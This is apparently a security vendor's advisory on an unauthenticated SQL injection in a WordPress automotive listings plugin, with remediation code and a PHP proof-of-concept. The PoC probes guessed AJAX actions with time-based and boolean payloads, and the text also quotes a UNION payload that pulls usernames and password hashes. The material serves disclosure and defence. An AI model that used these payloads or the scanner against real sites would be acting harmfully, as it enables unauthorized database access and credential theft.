Atomic Edge analysis of CVE-2025-67928 (metadata-based):
This vulnerability is an unauthenticated SQL injection in the Automotive Listings WordPress plugin versions up to and including 18.6. The flaw allows attackers to inject malicious SQL queries through insufficiently sanitized user input, leading to unauthorized data extraction from the WordPress database. The CVSS score of 7.5 (High) reflects the network-based attack vector, low attack complexity, and high confidentiality impact.
Atomic Edge research indicates the root cause is improper neutralization of special elements in SQL commands (CWE-89). The vulnerability description explicitly cites insufficient escaping of user-supplied parameters and a lack of sufficient preparation of the existing SQL query. This suggests the plugin constructs SQL queries by concatenating user-controlled input directly into the query string instead of binding it through prepared statements such as `$wpdb->prepare()`. The absence of nonce verification or capability checks on the affected endpoint is what makes unauthenticated exploitation possible. These conclusions are inferred from the CWE classification and vulnerability description, as no source code diff is available for confirmation.
Exploitation likely occurs via a public-facing WordPress AJAX endpoint. The plugin slug 'automotive' suggests AJAX action names such as 'automotive_search', 'automotive_filter', or 'automotive_get_listings'. Attackers would send HTTP POST requests to `/wp-admin/admin-ajax.php` with the `action` parameter set to the vulnerable hook. They would inject SQL payloads through another parameter, possibly named 'search', 'filter', or 'id'. A typical payload would use UNION-based injection to extract data from the WordPress database, such as `' UNION SELECT user_login,user_pass FROM wp_users--`. The lack of authentication requirements means no cookies or nonces are needed.
Remediation requires implementing proper input validation and parameterized queries. The patched version (18.7) likely replaced direct string concatenation with `$wpdb->prepare()` statements. The fix should also include proper capability checks to restrict endpoint access to authorized users when appropriate. WordPress developers should follow the WordPress Coding Standards for database operations, using the `$wpdb` class methods exclusively for database interactions.
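The remediation described above in working form, as an added example that is not the plugin's own code: a hypothetical listings-search AJAX handler (the action name, table name and parameter names are assumptions), shown first in the concatenated form the root-cause analysis describes and then rewritten with `$wpdb->prepare()`, a nonce check and input sanitisation.

```php
<?php
// Added example, not the plugin's code: a hypothetical AJAX handler for a
// listings search. Table name, action name and parameters are assumptions.

// UNSAFE form matching the root cause the advisory describes (CWE-89): the
// request parameter is spliced straight into the SQL string, so a single
// quote in 'make' terminates the literal and the remainder runs as SQL.
function automotive_search_unsafe() {
    global $wpdb;
    $make = $_POST['make'] ?? '';
    $sql  = "SELECT id, title, price FROM {$wpdb->prefix}automotive_listings "
          . "WHERE make = '" . $make . "' ORDER BY price";
    wp_send_json_success( $wpdb->get_results( $sql ) );
}

// HARDENED form: every user-controlled value is bound through a placeholder
// (%s / %d), so it can never alter the query structure. The table name is
// built from $wpdb->prefix, never from the request. The LIKE term is escaped
// with esc_like() because prepare() does not treat % and _ as wildcards.
function automotive_search_safe() {
    // Nonce check: a public (nopriv) endpoint still should not be callable
    // cross-site. For privileged actions add a current_user_can() check too.
    check_ajax_referer( 'automotive_search', 'nonce' );
    global $wpdb;

    $make   = sanitize_text_field( wp_unslash( $_POST['make'] ?? '' ) );
    $search = sanitize_text_field( wp_unslash( $_POST['search'] ?? '' ) );
    $limit  = min( absint( $_POST['per_page'] ?? 20 ), 100 ); // cap page size
    $table  = $wpdb->prefix . 'automotive_listings';
    $like   = '%' . $wpdb->esc_like( $search ) . '%';

    $sql = $wpdb->prepare(
        "SELECT id, title, price FROM {$table} "
        . "WHERE make = %s AND title LIKE %s "
        . "ORDER BY price LIMIT %d",
        $make, $like, $limit
    );
    wp_send_json_success( $wpdb->get_results( $sql ) );
}

// Register the hardened handler for both logged-in and anonymous callers.
add_action( 'wp_ajax_automotive_search', 'automotive_search_safe' );
add_action( 'wp_ajax_nopriv_automotive_search', 'automotive_search_safe' );
```

A column used in ORDER BY cannot be bound with %s; map such values to a fixed allow-list of column names before building the query.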
Successful exploitation enables complete database compromise. Attackers can extract sensitive information including WordPress user credentials (hashed passwords), personally identifiable information from custom tables, plugin configuration data, and other business-critical records. While the CVSS vector indicates no integrity or availability impact, data exposure alone represents a severe security breach. Attackers could use extracted password hashes for offline cracking or pivot to other attacks using stolen credentials.
// ==========================================================================
// Atomic Edge CVE Research | https://atomicedge.io
// Copyright (c) Atomic Edge. All rights reserved.
//
// LEGAL DISCLAIMER:
// This proof-of-concept is provided for authorized security testing and
// educational purposes only. Use of this code against systems without
// explicit written permission from the system owner is prohibited and may
// violate applicable laws including the Computer Fraud and Abuse Act (USA),
// Criminal Code s.342.1 (Canada), and the EU NIS2 Directive / national
// computer misuse statutes. This code is provided "AS IS" without warranty
// of any kind. Atomic Edge and its authors accept no liability for misuse,
// damages, or legal consequences arising from the use of this code. You are
// solely responsible for ensuring compliance with all applicable laws in
// your jurisdiction before use.
// ==========================================================================
// Atomic Edge CVE Research - Proof of Concept (metadata-based)
// CVE-2025-67928 - Automotive Listings <= 18.6 - Unauthenticated SQL Injection
<?php
/**
 * Proof of Concept for CVE-2025-67928
 * Assumptions based on metadata analysis:
 *   1. Vulnerability exists in an AJAX endpoint (common WordPress pattern)
 *   2. The AJAX action name contains 'automotive' (plugin slug)
 *   3. No authentication or nonce required (unauthenticated)
 *   4. SQL injection occurs via a GET/POST parameter
 */
$target_url = 'http://target-site.com/wp-admin/admin-ajax.php';

// Common AJAX action names for automotive plugins
$possible_actions = [
    'automotive_search_listings',
    'automotive_filter',
    'automotive_get_listings',
    'automotive_load_more',
    'automotive_ajax_search'
];

// SQL injection payload to test for vulnerability
// This payload attempts to trigger a delayed response to confirm injection
$sql_payload = "' OR 1=1 AND SLEEP(5)--";

// Common parameter names for automotive listing filters
$possible_params = [
    'search',
    'filter',
    'category',
    'make',
    'model',
    'year',
    'price_range',
    'id'
];

// Set once a candidate is found so the boolean-based fallback is skipped
$found = false;

foreach ($possible_actions as $action) {
    foreach ($possible_params as $param) {
        $post_data = [
            'action' => $action,
            $param   => $sql_payload
        ];
        $ch = curl_init();
        curl_setopt($ch, CURLOPT_URL, $target_url);
        curl_setopt($ch, CURLOPT_POST, true);
        curl_setopt($ch, CURLOPT_POSTFIELDS, $post_data);
        curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
        curl_setopt($ch, CURLOPT_TIMEOUT, 10);
        $start_time = microtime(true);
        $response = curl_exec($ch);
        $end_time = microtime(true);
        curl_close($ch);
        $response_time = $end_time - $start_time;
        // Check for signs of successful injection
        if ($response_time > 4.5) {
            echo "[+] Potential SQL Injection found!\n";
            echo "    Action: $action\n";
            echo "    Parameter: $param\n";
            echo "    Response time: {$response_time}s\n";
            $found = true;
            break 2;
        }
        // Also check for SQL error messages in response
        if ($response !== false && (
            strpos($response, 'SQL syntax') !== false ||
            strpos($response, 'MySQL') !== false ||
            strpos($response, 'database') !== false)) {
            echo "[+] SQL Error detected!\n";
            echo "    Action: $action\n";
            echo "    Parameter: $param\n";
            echo "    Response snippet: " . substr($response, 0, 200) . "\n";
            $found = true;
            break 2;
        }
    }
}

// If no injection detected with sleep, try a simpler boolean-based test
if (!$found) {
    echo "[-] No obvious SQL injection detected with time-based payload.\n";
    echo "    Trying boolean-based detection...\n";
    // Boolean-based test payloads
    $true_payload  = "' OR '1'='1";
    $false_payload = "' AND '1'='2";
    foreach ($possible_actions as $action) {
        foreach ($possible_params as $param) {
            // Test with true condition
            $post_data_true = ['action' => $action, $param => $true_payload];
            $ch = curl_init();
            curl_setopt_array($ch, [
                CURLOPT_URL            => $target_url,
                CURLOPT_POST           => true,
                CURLOPT_POSTFIELDS     => $post_data_true,
                CURLOPT_RETURNTRANSFER => true,
                CURLOPT_TIMEOUT        => 5
            ]);
            $response_true = curl_exec($ch);
            // Test with false condition
            $post_data_false = ['action' => $action, $param => $false_payload];
            curl_setopt($ch, CURLOPT_POSTFIELDS, $post_data_false);
            $response_false = curl_exec($ch);
            curl_close($ch);
            // Compare responses for differences indicating SQL injection
            if ($response_true !== $response_false &&
                strlen((string) $response_true) > 10 &&
                strlen((string) $response_false) > 10) {
                echo "[+] Boolean-based SQL Injection likely!\n";
                echo "    Action: $action\n";
                echo "    Parameter: $param\n";
                echo "    Response lengths - True: " . strlen($response_true) .
                     ", False: " . strlen($response_false) . "\n";
                break 2;
            }
        }
    }
}
echo "[!] PoC complete. Manual verification required.\n";
?>